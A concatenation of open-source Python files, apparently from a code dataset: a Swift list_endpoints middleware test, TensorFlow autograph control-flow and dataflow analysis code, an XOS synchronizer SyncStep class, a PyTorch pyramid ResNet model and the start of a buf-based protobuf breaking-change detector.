self.list_endpoints = list_endpoints.filter_factory(
{'swift_dir': self.testdir})(self.app)
def tearDown(self):
rmtree(self.testdir, ignore_errors=1)
def test_get_endpoint(self):
# Expected results for objects taken from test_ring
# Expected results for others computed by manually invoking
# ring.get_nodes().
resp = Request.blank('/endpoints/a/c/o1').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/1/a/c/o1",
"http://10.1.2.2:6000/sdd1/1/a/c/o1"
])
# Here, 'o1/' is the object name.
resp = Request.blank('/endpoints/a/c/o1/').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/3/a/c/o1/",
"http://10.1.2.2:6000/sdd1/3/a/c/o1/"
])
resp = Request.blank('/endpoints/a/c2').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sda1/2/a/c2",
"http://10.1.2.1:6000/sdc1/2/a/c2"
])
resp = Request.blank('/endpoints/a1').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.2.1:6000/sdc1/0/a1",
"http://10.1.1.1:6000/sda1/0/a1",
"http://10.1.1.1:6000/sdb1/0/a1"
])
resp = Request.blank('/endpoints/').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 400)
resp = Request.blank('/endpoints/a/c 2').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/3/a/c%202",
"http://10.1.2.2:6000/sdd1/3/a/c%202"
])
resp = Request.blank('/endpoints/a/c%202').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/3/a/c%202",
"http://10.1.2.2:6000/sdd1/3/a/c%202"
])
resp = Request.blank('/endpoints/ac%20count/con%20tainer/ob%20ject') \
.get_response(self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/3/ac%20count/con%20tainer/ob%20ject",
"http://10.1.2.2:6000/sdd1/3/ac%20count/con%20tainer/ob%20ject"
])
resp = Request.blank('/endpoints/a/c/o1', {'REQUEST_METHOD': 'POST'}) \
.get_response(self.list_endpoints)
self.assertEquals(resp.status_int, 405)
self.assertEquals(resp.status, '405 Method Not Allowed')
self.assertEquals(resp.headers['allow'], 'GET')
resp = Request.blank('/not-endpoints').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.status, '200 OK')
self.assertEquals(resp.body, 'FakeApp')
# test custom path with trailing slash
custom_path_le = list_endpoints.filter_factory({
'swift_dir': self.testdir,
'list_endpoints_path': '/some/another/path/'
})(self.app)
resp = Request.blank('/some/another/path/a/c/o1') \
.get_response(custom_path_le)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/1/a/c/o1",
"http://10.1.2.2:6000/sdd1/1/a/c/o1"
])
# test ustom path without trailing slash
custom_path_le = list_endpoints.filter_factory({
'swift_dir': self.testdir,
'list_endpoints_path': '/some/another/path'
})(self.app)
resp = Request.blank('/some/another/path/a/c/o1') \
.get_response(custom_path_le)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/1/a/c/o1",
"http://10.1.2.2:6000/sdd1/1/a/c/o1"
])
if __name__ == '__main__':
unittest.main()
| citrix-openstack-build/swift | test/unit/common/middleware/test_list_endpoints.py | Python | apache-2.0 | 8,008 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Control flow graph analysis.
Given a Python AST we construct a control flow graph, with edges both to the
next and previous statements (so it can easily walk the graph both ways). Its
nodes contain the AST of the statements. It can then perform forward or backward
analysis on this CFG.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import functools
import operator
import gast
from tensorflow.contrib.autograph.pyct import anno
from tensorflow.contrib.autograph.pyct.static_analysis import activity
class CfgNode(object):
"""A node in the CFG."""
__slots__ = ['next', 'value', 'prev']
def __init__(self, value):
self.next = set()
self.prev = set()
self.value = value
class Cfg(namedtuple('Cfg', ['entry', 'exit'])):
"""A Control Flow Graph.
Each statement is represented as a node. For control flow statements such
as conditionals and loops the conditional itself is a node which either
branches or cycles, respectively.
Attributes:
entry: The entry node, which contains the `gast.arguments` node of the
function definition.
exit: The exit node. This node is special because it has no value (i.e. no
corresponding AST node). This is because Python functions can have
multiple return statements.
"""
pass
class CfgBuilder(gast.NodeVisitor):
"""Construct a control flow graph.
Construct a CFG starting from a FunctionDef node.
Usage:
cfg_obj = CfgBuilder().build_cfg(fndef_node)
"""
def __init__(self):
# The current leaves of the CFG
self.current_leaves = []
# TODO(alexbw): generalize to break, return, continue, yield, etc.
# A stack of lists, tracking continue statements
self.continue_ = []
# A stack of lists tracking break nodes
self.break_ = []
def set_current_leaves(self, cfg_node):
"""Link this cfg_node to the current leaves.
This is the central function for building the CFG. It links the current
head cfg_nodes to the passed cfg_node. It then resets the head to the
passed cfg_node.
Args:
cfg_node: A CfgNode instance.
"""
for head in self.current_leaves:
head.next.add(cfg_node)
# While we're linking the CFG forward, add backlinks
cfg_node.prev.add(head)
self.current_leaves = [cfg_node]
def build_cfg(self, node):
"""Build a CFG for a function.
Implementation of building a CFG for dataflow analysis. See, e.g.:
https://www.seas.harvard.edu/courses/cs252/2011sp/slides/Lec02-Dataflow.pdf
Args:
node: A function definition the body of which to analyze.
Returns:
A CFG object.
Raises:
TypeError: If the input is not a function definition.
"""
if not isinstance(node, gast.FunctionDef):
raise TypeError('input must be a function definition')
entry_cfg_node = CfgNode(node.args)
self.current_leaves = [entry_cfg_node]
self.visit_statements(node.body)
exit_cfg_node = CfgNode(None)
self.set_current_leaves(exit_cfg_node)
return Cfg(entry_cfg_node, exit_cfg_node)
def visit_statements(self, nodes):
for node in nodes:
# Check for control flow
if isinstance(node, (gast.For, gast.While, gast.If, gast.Try, gast.Break,
gast.Continue, gast.With)):
self.visit(node)
else:
expr = CfgNode(node)
self.set_current_leaves(expr)
def generic_visit(self, node):
raise ValueError('unknown control flow')
def visit_If(self, node):
# TODO(alexbw): change this to use immutable tuples instead of lists
# The current head will hold the conditional
test = CfgNode(node.test)
self.set_current_leaves(test)
# Handle the body
self.visit_statements(node.body)
body_exit = self.current_leaves
self.current_leaves = [test]
# Handle the orelse
self.visit_statements(node.orelse)
self.current_leaves.extend(body_exit)
def visit_While(self, node):
test = CfgNode(node.test)
self.set_current_leaves(test)
# Start a new level of nesting
self.break_.append([])
self.continue_.append([])
# Handle the body
self.visit_statements(node.body)
body_exit = self.current_leaves
self.current_leaves.extend(self.continue_.pop())
self.set_current_leaves(test)
# Handle the orelse
self.visit_statements(node.orelse)
# The break statements and the test go to the next node
self.current_leaves.extend(self.break_.pop())
# Body and orelse statements can reach out of the loop
self.current_leaves.extend(body_exit)
def visit_For(self, node):
iter_ = CfgNode(node.iter)
self.set_current_leaves(iter_)
self.break_.append([])
self.continue_.append([])
self.visit_statements(node.body)
body_exit = self.current_leaves
self.current_leaves.extend(self.continue_.pop())
self.set_current_leaves(iter_)
# Handle the orelse
self.visit_statements(node.orelse)
# The break statements and the test go to the next node
self.current_leaves.extend(self.break_.pop())
# Body and orelse statements can reach out of the loop
self.current_leaves.extend(body_exit)
def visit_Break(self, node):
self.break_[-1].extend(self.current_leaves)
self.current_leaves[:] = []
def visit_Continue(self, node):
self.continue_[-1].extend(self.current_leaves)
self.current_leaves[:] = []
def visit_Try(self, node):
self.visit_statements(node.body)
body = self.current_leaves
handlers = []
for handler in node.handlers:
self.current_leaves = body[:]
self.visit_statements(handler.body)
handlers.extend(self.current_leaves)
self.current_leaves = body
self.visit_statements(node.orelse)
self.current_leaves = handlers + self.current_leaves
self.visit_statements(node.finalbody)
def visit_With(self, node):
for item in node.items:
self.set_current_leaves(CfgNode(item))
self.visit_statements(node.body)
# TODO(alexbw): once CFG analysis occurs at a block level,
# this extra class will not be necessary
class PropagateAnalysis(gast.NodeVisitor):
"""Port analysis annotations from statements to their enclosing blocks."""
def __init__(self, analysis):
self.transfer_fn = analysis.transfer_fn
self.in_label = analysis.in_label
self.out_label = analysis.out_label
super(PropagateAnalysis, self).__init__()
def visit_If(self, node):
# Depth-first.
self.generic_visit(node)
incoming = anno.getanno(node.body[0], self.in_label)
incoming |= anno.getanno(node.test, self.in_label)
outgoing = anno.getanno(node.body[-1], self.out_label)
outgoing |= anno.getanno(node.test, self.out_label)
if node.orelse:
orelse_outgoing = anno.getanno(node.orelse[-1], self.out_label)
outgoing = self.transfer_fn(outgoing, orelse_outgoing)
anno.setanno(node, self.in_label, incoming)
anno.setanno(node, self.out_label, outgoing)
def visit_For(self, node):
self.generic_visit(node)
incoming = set(anno.getanno(node.body[0], self.in_label))
incoming -= set((anno.getanno(node.target, anno.Basic.QN),))
outgoing = anno.getanno(node.body[-1], self.out_label)
if node.orelse:
orelse_outgoing = anno.getanno(node.orelse[-1], self.out_label)
outgoing = self.transfer_fn(outgoing, orelse_outgoing)
anno.setanno(node, self.in_label, frozenset(incoming))
anno.setanno(node, self.out_label, outgoing)
def visit_While(self, node):
self.generic_visit(node)
incoming = anno.getanno(node.body[0], self.in_label)
incoming |= anno.getanno(node.test, self.in_label)
outgoing = anno.getanno(node.body[-1], self.out_label)
if node.orelse:
orelse_outgoing = anno.getanno(node.orelse[-1], self.out_label)
outgoing = self.transfer_fn(outgoing, orelse_outgoing)
anno.setanno(node, self.in_label, incoming)
anno.setanno(node, self.out_label, outgoing)
def visit_With(self, node):
self.generic_visit(node)
incoming = anno.getanno(node.body[0], self.in_label)
for item in node.items:
incoming |= anno.getanno(item, self.in_label)
outgoing = anno.getanno(node.body[-1], self.out_label)
anno.setanno(node, self.in_label, incoming)
anno.setanno(node, self.out_label, outgoing)
# TODO(alexbw): Abstract the CFG walking machinery into a superclass
# which is parameterized on which fields it selects when walking.
# TODO(alexbw): Abstract the application of dataflow analysis
class Forward(object):
"""Forward analysis on CFG.
Args:
label: A name for this analysis e.g. 'active' for activity analysis. The AST
nodes in the CFG will be given annotations 'name_in', 'name_out',
'name_gen' and 'name_kill' which contain the incoming values, outgoing
values, values generated by the statement, and values deleted by the
statement respectively.
transfer_fn: Either the AND or OR operator. If the AND operator is used it
turns into forward must analysis (i.e. a value will only be carried
forward if it appears on all incoming paths). The OR operator means that
forward may analysis is done (i.e. the union of incoming values will be
taken).
"""
def __init__(self, label, source_info, transfer_fn=operator.or_):
self.transfer_fn = transfer_fn
self.source_info = source_info
self.out_label = label + '_out'
self.in_label = label + '_in'
self.gen_label = label + '_gen'
self.kill_label = label + '_kill'
# TODO(alexbw): see if we can simplify by visiting breadth-first
def visit(self, node):
"""Depth-first walking the CFG, applying dataflow info propagation."""
# node.value is None only for the exit CfgNode.
if not node.value:
return
if anno.hasanno(node.value, self.out_label):
before = hash(anno.getanno(node.value, self.out_label))
else:
before = None
preds = [
anno.getanno(pred.value, self.out_label)
for pred in node.prev
if anno.hasanno(pred.value, self.out_label)
]
if preds:
incoming = functools.reduce(self.transfer_fn, preds[1:], preds[0])
else:
incoming = frozenset()
anno.setanno(node.value, self.in_label, incoming)
gen, kill = self.get_gen_kill(node, incoming)
anno.setanno(node.value, self.gen_label, gen)
anno.setanno(node.value, self.kill_label, kill)
anno.setanno(node.value, self.out_label, (incoming - kill) | gen)
if hash(anno.getanno(node.value, self.out_label)) != before:
for succ in node.next:
self.visit(succ)
def get_gen_kill(self, cfg_node, incoming):
"""Calculate Gen and Kill properties of a CFG node in dataflow analysis.
A function which takes the CFG node as well as a set of incoming
values. It must return a set of newly generated values by the statement as
well as a set of deleted (killed) values.
Args:
cfg_node: A CfgNode instance.
incoming:
"""
raise NotImplementedError()
class Backward(Forward):
"""Backward analysis on CFG."""
def visit(self, cfg_node):
# cfg_node.value is None for the exit node, which will be visited only once
if not cfg_node.value:
for pred in cfg_node.prev:
self.visit(pred)
return
if anno.hasanno(cfg_node.value, self.in_label):
before = hash(anno.getanno(cfg_node.value, self.in_label))
else:
before = None
succs = [
anno.getanno(succ.value, self.in_label)
for succ in cfg_node.next
if anno.hasanno(succ.value, self.in_label)
]
if succs:
incoming = functools.reduce(self.transfer_fn, succs[1:], succs[0])
else:
incoming = frozenset()
anno.setanno(cfg_node.value, self.out_label, incoming)
gen, kill = self.get_gen_kill(cfg_node, incoming)
anno.setanno(cfg_node.value, self.gen_label, gen)
anno.setanno(cfg_node.value, self.kill_label, kill)
anno.setanno(cfg_node.value, self.in_label, (incoming - kill) | gen)
if hash(anno.getanno(cfg_node.value, self.in_label)) != before:
for pred in cfg_node.prev:
self.visit(pred)
def run_analyses(node, analyses):
"""Perform dataflow analysis on all functions within an AST.
Args:
node: An AST node on which to run dataflow analysis.
analyses: Either an instance of the Forward or Backward dataflow analysis
class, or a list or tuple of them.
Returns:
node: The node, but now with annotations on the AST nodes containing the
results of the dataflow analyses.
"""
if not isinstance(analyses, (tuple, list)):
analyses = (analyses,)
for analysis in analyses:
if not isinstance(analysis, (Forward, Backward)):
raise TypeError('not a valid forward analysis object')
for child_node in gast.walk(node):
if isinstance(child_node, gast.FunctionDef):
cfg_obj = CfgBuilder().build_cfg(child_node)
for analysis in analyses:
if isinstance(analysis, Backward):
analysis.visit(cfg_obj.exit)
elif isinstance(analysis, Forward):
analysis.visit(cfg_obj.entry)
for analysis in analyses:
PropagateAnalysis(analysis).visit(node)
return node
class Liveness(Backward):
"""Perform a liveness analysis.
Each statement is annotated with a set of variables that may be used
later in the program.
"""
def __init__(self, source_info):
super(Liveness, self).__init__('live', source_info)
def get_gen_kill(self, node, _):
# A variable's parents are live if it is live
# e.g. x is live if x.y is live. This means gen needs to return
# all parents of a variable (if it's an Attribute or Subscript).
# This doesn't apply to kill (e.g. del x.y doesn't affect liveness of x)
gen = activity.get_read(node.value, self.source_info)
gen = functools.reduce(lambda left, right: left | right.support_set, gen,
gen)
kill = activity.get_updated(node.value, self.source_info)
return gen, kill
class ReachingDefinitions(Forward):
"""Perform reaching definition analysis.
Each statement is annotated with a set of (variable, definition) pairs.
"""
def __init__(self, source_info):
super(ReachingDefinitions, self).__init__('definitions', source_info)
def get_gen_kill(self, node, incoming):
definitions = activity.get_updated(node.value, self.source_info)
gen = frozenset((id_, node.value) for id_ in definitions)
kill = frozenset(def_ for def_ in incoming if def_[0] in definitions)
return gen, kill
class Defined(Forward):
"""Perform defined variable analysis.
Each statement is annotated with a set of variables which are guaranteed to
be defined at that point.
"""
def __init__(self, source_info):
super(Defined, self).__init__(
'defined', source_info, transfer_fn=operator.and_)
def get_gen_kill(self, node, _):
gen = activity.get_updated(node.value, self.source_info)
return gen, frozenset()
| caisq/tensorflow | tensorflow/contrib/autograph/pyct/static_analysis/cfg.py | Python | apache-2.0 | 15,704 |
import os
import base64
from datetime import datetime
from xos.config import Config
from xos.logger import Logger, logging
from synchronizers.base.steps import *
from django.db.models import F, Q
from core.models import *
from django.db import reset_queries
from synchronizers.base.ansible import *
from generate.dependency_walker import *
from time import time
import json
import time
import pdb
logger = Logger(level=logging.INFO)
def f7(seq):
seen = set()
seen_add = seen.add
return [ x for x in seq if not (x in seen or seen_add(x))]
def elim_dups(backend_str):
strs = backend_str.split(' // ')
strs2 = f7(strs)
return ' // '.join(strs2)
def deepgetattr(obj, attr):
return reduce(getattr, attr.split('.'), obj)
class InnocuousException(Exception):
pass
class DeferredException(Exception):
pass
class FailedDependency(Exception):
pass
class SyncStep(object):
""" An XOS Sync step.
Attributes:
psmodel Model name the step synchronizes
dependencies list of names of models that must be synchronized first if the current model depends on them
"""
# map_sync_outputs can return this value to cause a step to be marked
# successful without running ansible. Used for sync_network_controllers
# on nat networks.
SYNC_WITHOUT_RUNNING = "sync_without_running"
slow=False
def get_prop(self, prop):
try:
sync_config_dir = Config().sync_config_dir
except:
sync_config_dir = '/etc/xos/sync'
prop_config_path = '/'.join(sync_config_dir,self.name,prop)
return open(prop_config_path).read().rstrip()
def __init__(self, **args):
"""Initialize a sync step
Keyword arguments:
name -- Name of the step
provides -- XOS models sync'd by this step
"""
dependencies = []
self.driver = args.get('driver')
self.error_map = args.get('error_map')
try:
self.soft_deadline = int(self.get_prop('soft_deadline_seconds'))
except:
self.soft_deadline = 5 # 5 seconds
return
def fetch_pending(self, deletion=False):
# This is the most common implementation of fetch_pending
# Steps should override it if they have their own logic
# for figuring out what objects are outstanding.
main_objs = self.observes
if (type(main_objs) is not list):
main_objs=[main_objs]
objs = []
for main_obj in main_objs:
if (not deletion):
lobjs = main_obj.objects.filter(Q(enacted__lt=F('updated')) | Q(enacted=None),Q(lazy_blocked=False),Q(no_sync=False))
else:
lobjs = main_obj.deleted_objects.all()
objs.extend(lobjs)
return objs
#return Instance.objects.filter(ip=None)
def check_dependencies(self, obj, failed):
for dep in self.dependencies:
peer_name = dep[0].lower() + dep[1:] # django names are camelCased with the first letter lower
peer_objects=[]
try:
peer_names = plural(peer_name)
peer_object_list=[]
try:
peer_object_list.append(deepgetattr(obj, peer_name))
except:
pass
try:
peer_object_list.append(deepgetattr(obj, peer_names))
except:
pass
for peer_object in peer_object_list:
try:
peer_objects.extend(peer_object.all())
except AttributeError:
peer_objects.append(peer_object)
except:
peer_objects = []
if (hasattr(obj,'controller')):
try:
peer_objects = filter(lambda o:o.controller==obj.controller, peer_objects)
except AttributeError:
pass
if (failed in peer_objects):
if (obj.backend_status!=failed.backend_status):
obj.backend_status = failed.backend_status
obj.save(update_fields=['backend_status'])
raise FailedDependency("Failed dependency for %s:%s peer %s:%s failed %s:%s" % (obj.__class__.__name__, str(getattr(obj,"pk","no_pk")), peer_object.__class__.__name__, str(getattr(peer_object,"pk","no_pk")), failed.__class__.__name__, str(getattr(failed,"pk","no_pk"))))
def sync_record(self, o):
try:
controller = o.get_controller()
controller_register = json.loads(controller.backend_register)
if (controller_register.get('disabled',False)):
raise InnocuousException('Controller %s is disabled'%controller.name)
except AttributeError:
pass
tenant_fields = self.map_sync_inputs(o)
if tenant_fields == SyncStep.SYNC_WITHOUT_RUNNING:
return
main_objs=self.observes
if (type(main_objs) is list):
main_objs=main_objs[0]
path = ''.join(main_objs.__name__).lower()
res = run_template(self.playbook,tenant_fields,path=path)
try:
self.map_sync_outputs(o,res)
except AttributeError:
pass
def delete_record(self, o):
try:
controller = o.get_controller()
controller_register = json.loads(o.node.site_deployment.controller.backend_register)
if (controller_register.get('disabled',False)):
raise InnocuousException('Controller %s is disabled'%sliver.node.site_deployment.controller.name)
except AttributeError:
pass
tenant_fields = self.map_delete_inputs(o)
main_objs=self.observes
if (type(main_objs) is list):
main_objs=main_objs[0]
path = ''.join(main_objs.__name__).lower()
tenant_fields['delete']=True
res = run_template(self.playbook,tenant_fields,path=path)
try:
self.map_delete_outputs(o,res)
except AttributeError:
pass
def call(self, failed=[], deletion=False):
#if ('Instance' in self.__class__.__name__):
# pdb.set_trace()
pending = self.fetch_pending(deletion)
for o in pending:
# another spot to clean up debug state
try:
reset_queries()
except:
# this shouldn't happen, but in case it does, catch it...
logger.log_exc("exception in reset_queries",extra=o.tologdict())
sync_failed = False
try:
backoff_disabled = Config().observer_backoff_disabled
except:
backoff_disabled = 0
try:
scratchpad = json.loads(o.backend_register)
if (scratchpad):
next_run = scratchpad['next_run']
if (not backoff_disabled and next_run>time.time()):
sync_failed = True
except:
logger.log_exc("Exception while loading scratchpad",extra=o.tologdict())
pass
if (not sync_failed):
try:
for f in failed:
self.check_dependencies(o,f) # Raises exception if failed
if (deletion):
self.delete_record(o)
o.delete(purge=True)
else:
new_enacted = datetime.now() # Is this the same timezone? XXX
self.sync_record(o)
o.enacted = new_enacted
scratchpad = {'next_run':0, 'exponent':0, 'last_success':time.time()}
o.backend_register = json.dumps(scratchpad)
o.backend_status = "1 - OK"
o.save(update_fields=['enacted','backend_status','backend_register'])
except (InnocuousException,Exception,DeferredException) as e:
logger.log_exc("sync step failed!",extra=o.tologdict())
try:
if (o.backend_status.startswith('2 - ')):
str_e = '%s // %r'%(o.backend_status[4:],e)
str_e = elim_dups(str_e)
else:
str_e = '%r'%e
except:
str_e = '%r'%e
try:
error = self.error_map.map(str_e)
except:
error = '%s'%str_e
if isinstance(e, InnocuousException):
o.backend_status = '1 - %s'%error
else:
o.backend_status = '2 - %s'%error
try:
scratchpad = json.loads(o.backend_register)
scratchpad['exponent']
except:
logger.log_exc("Exception while updating scratchpad",extra=o.tologdict())
scratchpad = {'next_run':0, 'exponent':0, 'last_success':time.time(),'failures':0}
# Second failure
if (scratchpad['exponent']):
if isinstance(e,DeferredException):
delay = scratchpad['exponent'] * 60 # 1 minute
else:
delay = scratchpad['exponent'] * 600 # 10 minutes
# cap delays at 8 hours
if (delay>8*60*60):
delay=8*60*60
scratchpad['next_run'] = time.time() + delay
try:
scratchpad['exponent']+=1
except:
scratchpad['exponent']=1
try:
scratchpad['failures']+=1
except KeyError:
scratchpad['failures']=1
scratchpad['last_failure']=time.time()
o.backend_register = json.dumps(scratchpad)
# TOFIX:
# DatabaseError: value too long for type character varying(140)
if (o.pk):
try:
o.backend_status = o.backend_status[:1024]
o.save(update_fields=['backend_status','backend_register','updated'])
except:
print "Could not update backend status field!"
pass
sync_failed = True
if (sync_failed):
failed.append(o)
return failed
def __call__(self, **args):
return self.call(**args)
| xmaruto/mcord | xos/synchronizers/base/syncstep.py | Python | apache-2.0 | 10,897 |
import os
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
def make_conv_bn_relu(in_channels, out_channels, kernel_size=3, stride=1, padding=1, groups=1):
return [
nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=padding, groups=groups, bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
]
def make_linear_bn_relu(in_channels, out_channels):
return [
nn.Linear(in_channels, out_channels, bias=False),
nn.BatchNorm1d(out_channels),
nn.ReLU(inplace=True),
]
def make_max_flat(out):
flat = F.adaptive_max_pool2d(out,output_size=1) ##nn.AdaptiveMaxPool2d(1)(out)
flat = flat.view(flat.size(0), -1)
return flat
def make_avg_flat(out):
flat = F.adaptive_avg_pool2d(out,output_size=1)
flat = flat.view(flat.size(0), -1)
return flat
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class PyResNet(nn.Module):
def __init__(self, block, layers, in_shape=(3,256,256), num_classes=17):
self.inplanes = 64
super(PyResNet, self).__init__()
in_channels, height, width = in_shape
# self.conv0 = nn.Sequential(
# *make_conv_bn_relu(in_channels, 64, kernel_size=7, stride=2, padding=3, groups=1)
# )
self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self.make_layer(block, 64, layers[0])
self.layer2 = self.make_layer(block, 128, layers[1], stride=2)
self.layer3 = self.make_layer(block, 256, layers[2], stride=2)
self.layer4 = self.make_layer(block, 512, layers[3], stride=2)
self.fc2 = nn.Sequential(
*make_linear_bn_relu(128 * block.expansion, 512),
nn.Linear(512, num_classes),
)
self.fc3 = nn.Sequential(
*make_linear_bn_relu(256 * block.expansion, 512),
nn.Linear(512, num_classes),
)
self.fc4 = nn.Sequential(
*make_linear_bn_relu(512 * block.expansion, 512),
nn.Linear(512, num_classes),
)
# self.fc = nn.Sequential(
# *make_linear_bn_relu((128+256+512) * block.expansion, 1024),
# nn.Linear(1024, num_classes)
# )
#
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
#x = self.conv0(x)
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = F.max_pool2d(x, kernel_size=3, stride=2, padding=1)
x = self.layer1(x) # 64, 64x64
x = self.layer2(x) #128, 32x32
flat2 = make_max_flat(x) ##make_avg_flat
x = self.layer3(x) #256, 16x16
flat3 = make_max_flat(x)
x = self.layer4(x) #512, 8x8
flat4 = make_max_flat(x)
# x = torch.cat([flat2,flat3,flat4,],1)
# x = self.fc(x)
x = self.fc2(flat2) + self.fc3(flat3) + self.fc4(flat4)
logit = x
prob = F.sigmoid(logit)
return logit, prob
def pyresnet18(**kwargs):
model = PyResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
return model
def pyresnet34(**kwargs):
model = PyResNet(BasicBlock, [3, 4, 6, 3], **kwargs)
return model
########################################################################################
if __name__ == '__main__':
print( '%s: calling main function ... ' % os.path.basename(__file__))
# https://discuss.pytorch.org/t/print-autograd-graph/692/8
batch_size = 1
num_classes = 17
C,H,W = 3,256,256
inputs = torch.randn(batch_size,C,H,W)
labels = torch.randn(batch_size,num_classes)
in_shape = inputs.size()[1:]
if 1:
net = pyresnet34(in_shape=in_shape, num_classes=num_classes).cuda().train()
x = Variable(inputs)
logits, probs = net.forward(x.cuda())
loss = nn.MultiLabelSoftMarginLoss()(logits, Variable(labels.cuda()))
loss.backward()
print(type(net))
print(net)
print('probs')
print(probs)
#input('Press ENTER to continue.')
| chicm/carvana | car-segment/net/imagenet/pyramidnet1.py | Python | apache-2.0 | 6,020 |
""" Protocol Buffer Breaking Change Detector
This tool is used to detect "breaking changes" in protobuf files, to
ensure proper backwards-compatibility in protobuf API updates. The tool
can check for breaking changes of a single API by taking 2 .proto file
paths as input (before and after) and outputting a bool `is_breaking`.
The breaking change detector creates a temporary directory, copies in
each file to compute a protobuf "state", computes a diff of the "before"
and "after" states, and runs the diff against a set of rules to determine
if there was a breaking change.
The tool is currently implemented with buf (https://buf.build/)
"""
from pathlib import Path
from typing import List
from tools.api_proto_breaking_change_detector.buf_utils import check_breaking, pull_buf_deps
from tools.api_proto_breaking_change_detector.detector_errors import ChangeDetectorError
class ProtoBreakingChangeDetector(object):
"""Abstract breaking change detector interface"""
def run_detector(self) -> None:
"""Run the breaking change detector to detect rule violations
This method should populate the detector's internal data such
that `is_breaking` does not require any additional invocations
to the breaking change detector.
"""
pass
def is_breaking(self) -> bool:
"""Return True if breaking changes were detected in the given protos"""
pass
def get_breaking_changes(self) -> List[str]:
"""Return a list of strings containing breaking changes output by the tool"""
pass
class BufWrapper(ProtoBreakingChangeDetector):
"""Breaking change detector implemented with buf"""
def __init__(
self,
path_to_changed_dir: str,
git_ref: str,
git_path: str,
subdir: str = None,
buf_path: str = None,
config_file_loc: str = None,
additional_args: List[str] = None) -> None:
"""Initialize the configuration of buf
This function sets up any necessary config without actually
running buf against any proto files.
BufWrapper takes a path to a directory containing proto files
as input, and it checks if these proto files break any changes
from a given initial state.
The initial state is input as a git ref. The constructor expects
a git ref string, as well as an absolute path to a .git folder
for the repository.
Args:
path_to_changed_dir {str} -- absolute path to a directory containing proto files in the after state
buf_path {str} -- path to the buf binary (default: "buf")
git_ref {str} -- git reference to use for the initial state of the protos (typically a commit hash)
git_path {str} -- absolute path to .git folder for the repository of interest
subdir {str} -- subdirectory within git repository from which to search for .proto files (default: None, e.g. stay in root)
additional_args {List[str]} -- additional arguments passed into the buf binary invocations
config_file_loc {str} -- absolute path to buf.yaml configuration file (if not provided, uses default buf configuration)
"""
if not Path(path_to_changed_dir).is_dir():
raise ValueError(f"path_to_changed_dir {path_to_changed_dir} is not a valid directory")
if Path.cwd() not in Path(path_to_changed_dir).parents:
raise ValueError(
f"path_to_changed_dir {path_to_changed_dir} must be a subdirectory of the cwd ({ Path.cwd() })"
)
if not Path(git_path).exists():
raise ChangeDetectorError(f'path to .git folder {git_path} does not exist')
self._path_to_changed_dir = path_to_changed_dir
self._additional_args = additional_args
self._buf_path = buf_path or "buf"
self._config_file_loc = config_file_loc
self._git_ref = git_ref
self._git_path = git_path
self._subdir = subdir
self._final_result = None
